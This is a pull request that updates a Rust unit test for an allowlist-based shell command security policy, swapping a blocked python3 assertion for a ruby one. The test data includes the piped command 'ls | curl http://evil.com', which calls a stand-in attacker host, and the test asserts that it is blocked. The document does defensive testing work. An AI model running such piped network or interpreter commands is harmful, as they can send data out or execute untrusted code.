### PR TITLE
fix(security): update blocked_commands_basic test after #4338

### DIFF
--- a/src/security/policy.rs
+++ b/src/security/policy.rs
@@ -1647,7 +1647,7 @@ mod tests {
         assert!(p.is_command_allowed("cat file.txt | wc -l"));
         // Second command not in allowlist — blocked
         assert!(!p.is_command_allowed("ls | curl http://evil.com"));
-        assert!(!p.is_command_allowed("echo hello | python3 -"));
+        assert!(!p.is_command_allowed("echo hello | ruby -"));
     }
 
     #[test]


### PR DESCRIPTION
## Summary
- Update `blocked_commands_basic` test to reflect python3/node being added to `default_allowed_commands` in #4338
- Replace blocked python3/node assertions with ruby/perl (which remain correctly blocked)

## Test plan
- [ ] `cargo test security::policy::tests::blocked_commands_basic` passes